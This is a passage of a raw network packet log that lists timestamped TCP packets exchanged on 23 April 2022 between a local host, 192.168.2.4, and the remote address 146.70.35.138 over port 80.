                                          Apr 23, 2022 08:12:20.698807955 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.698842049 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.776896954 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.800626993 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151750088 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151791096 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151819944 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151839018 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151865005 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151890993 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151916027 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151933908 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151958942 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.151981115 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.151984930 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.152013063 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.152030945 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.152031898 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.152045965 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.152050972 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.152076006 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.152092934 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.191756964 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.191807032 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.191836119 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.191871881 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.191878080 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.191915035 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.191930056 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.191934109 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.191953897 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.191955090 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192009926 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192009926 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192038059 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192061901 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192137003 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192178011 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192213058 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192222118 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192238092 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192260981 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192301035 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192313910 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192331076 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192358017 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192400932 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192442894 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192456961 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192470074 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192497969 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192509890 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192540884 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.192564011 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.192586899 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.231730938 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.231781960 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.231817007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.231880903 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.231909037 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.231935024 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.231950998 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.231980085 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.231992006 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232021093 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232122898 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232151985 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232172966 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.232187033 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.232191086 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.232269049 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.232482910 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232541084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232568979 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232570887 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.232610941 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232629061 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.232664108 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.232671976 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.232719898 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.271845102 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.271897078 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.271924973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.271928072 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.271966934 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.271967888 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272027969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272028923 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272062063 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272087097 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272104025 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272146940 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272154093 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272175074 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272202015 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272217989 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272258997 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272260904 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272286892 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272310019 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272387981 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272443056 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272449017 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272504091 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272659063 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272723913 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272727013 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272761106 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272780895 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272820950 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272861004 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.272871017 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.272923946 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.311638117 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.311677933 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.311692953 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.311712027 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.311734915 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.311748981 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.311892033 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.311938047 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.312145948 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312172890 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312189102 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312232018 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.312515974 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312540054 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312556982 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312581062 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312598944 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312623024 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.312671900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.312839985 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312865019 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312880039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312903881 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312907934 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.312927961 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312944889 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.312959909 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.313005924 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.313044071 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.313069105 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.313082933 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.313112974 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.313148975 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.313199997 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.313252926 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.351893902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.351959944 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.351999998 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352032900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.352050066 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352075100 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.352091074 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352133036 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.352174997 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.352294922 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352358103 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352400064 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352400064 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.352446079 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.352448940 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352488041 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.352562904 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.352577925 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.353316069 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353373051 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353411913 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353462934 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353466988 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.353501081 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.353517056 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353553057 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353593111 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.353605986 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.353607893 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353663921 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353699923 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353701115 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.353748083 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.353750944 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.353852987 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.391968012 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392033100 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392081022 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392147064 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392149925 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.392163038 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392193079 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.392196894 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.392220020 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.392251968 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392302990 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392306089 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.392338037 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392354965 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.392385960 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392421007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.392432928 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.392477036 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.393404961 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393459082 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393479109 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.393492937 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393498898 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.393539906 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393591881 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.393611908 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393649101 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393696070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393742085 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393760920 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.393779993 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393784046 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.393817902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.393872976 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.432259083 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432308912 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432337046 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432369947 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432403088 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432425976 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432461023 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432496071 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432521105 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432539940 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.432554960 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432591915 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432615995 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432625055 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.432650089 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432677031 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.432684898 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.432745934 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.433655977 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433711052 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433742046 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433763027 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.433789968 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433840990 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433856964 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.433873892 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433921099 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433927059 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.433969021 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.433995008 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.433996916 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.434031963 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.434039116 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.434084892 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.472415924 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472440958 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472454071 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472470045 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472482920 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472563982 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.472615004 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.472786903 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472805977 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472816944 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472862959 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.472902060 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472903013 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.472915888 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.472954988 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.472971916 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.473431110 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473449945 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473462105 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473478079 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473490000 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473510027 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.473530054 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.473704100 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473721981 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473733902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473769903 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.473771095 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473789930 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473798990 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.473803043 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.473815918 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.473844051 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.473989010 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474005938 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474019051 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474049091 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.474066973 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.474081039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.474133015 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.512749910 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512794018 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512830019 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512856007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512880087 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.512937069 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.512996912 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513096094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513139009 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513155937 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513175011 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513200045 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513200998 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513227940 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513231039 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513273954 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513854027 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513892889 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513926983 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513951063 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.513952971 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.513984919 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514014006 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514019012 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514053106 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514054060 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514079094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514095068 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514102936 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514113903 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514137983 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514153957 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514179945 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514192104 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514233112 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514255047 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514259100 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514281988 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.514286041 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.514329910 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552782059 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552823067 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552843094 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552849054 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552858114 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552877903 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552886009 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:21.552918911 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:21.552926064 CEST4976680192.168.2.4146.70.35.138
